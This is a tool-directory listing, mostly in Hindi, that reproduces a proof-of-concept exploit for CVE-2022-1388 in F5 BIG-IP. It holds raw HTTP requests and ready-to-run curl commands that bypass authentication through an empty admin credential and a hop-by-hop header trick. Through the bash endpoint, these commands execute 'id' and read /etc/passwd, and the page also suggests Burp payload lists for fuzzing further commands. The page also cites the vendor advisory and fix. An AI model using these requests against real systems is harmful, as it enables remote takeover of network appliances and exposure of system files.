Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-1388_PoC — F5 BIG-IP RCE शोषण (CVE-2022-1388) | Kitploit
उपकरण/GitHubGitHub/alt3kx/cve-2022-1388_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणAPI सुरक्षा
GitHubalt3kx/cve-2022-1388_poc

CVE-2022-1388_PoC

F5 BIG-IP RCE शोषण (CVE-2022-1388)

रिपॉजिटरी देखें
871774 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

F5 BIG-IP RCE शोषण (CVE-2022-1388)

POST (1): poc_id

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c 'id' " }

curl कमांड-लाइन:

$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' \
-H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
-H $'Content-Length: 52' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a' \
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

POST (2): poc_pass

POST /mgmt/tm/util/bash HTTP/1.1
Host: <redateced>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0

{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }

curl कमांड-लाइन:

$ curl -i -s -k -X $'POST' \
-H $'Host: <redacted>:8443' \
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token' \
-H $'X-F5-Auth-Token: 0' \
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a' \
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080

नोट:

Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>" 
+ value of headers ,see "HTTP hop_by_hop request headers"...

मेरा BIG-IP अब ठीक हो गया:

image

संदर्भ और सुधार :

  • https://support.f5.com/csp/article/K23605346
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

यहाँ नवीनतम नोट्स के लिए उपयोग किए गए दस्तावेज़:

  • https://clouddocs.f5.com/api/icontrol-rest/

HTTP hop_by_hop अनुरोध हेडर:

  • https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open

F5 iControl REST एंडपॉइंट प्रमाणीकरण बाईपास तकनीकी डीप डाइव (horizon3 द्वारा)

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

मेरे नोट्स:

  • मेरे शोध में उपयोग किए गए icontrol एंडपॉइंट्स और कमांड्स की सूची के साथ अपडेट किया गया (सार्वजनिक दस्तावेज़ से निकाला गया)
  • Burp का उपयोग "cluster bomb" या "Battering ram" (सरल सूची) के साथ कर सकते हैं, जैसे

Payload1: icontrol_api_endpoints.txt
Payload2: icontrol_api_commands.txt

लेखक

Alex Hernandez उर्फ (@_alt3kx_)

टूल डाउनलोड करें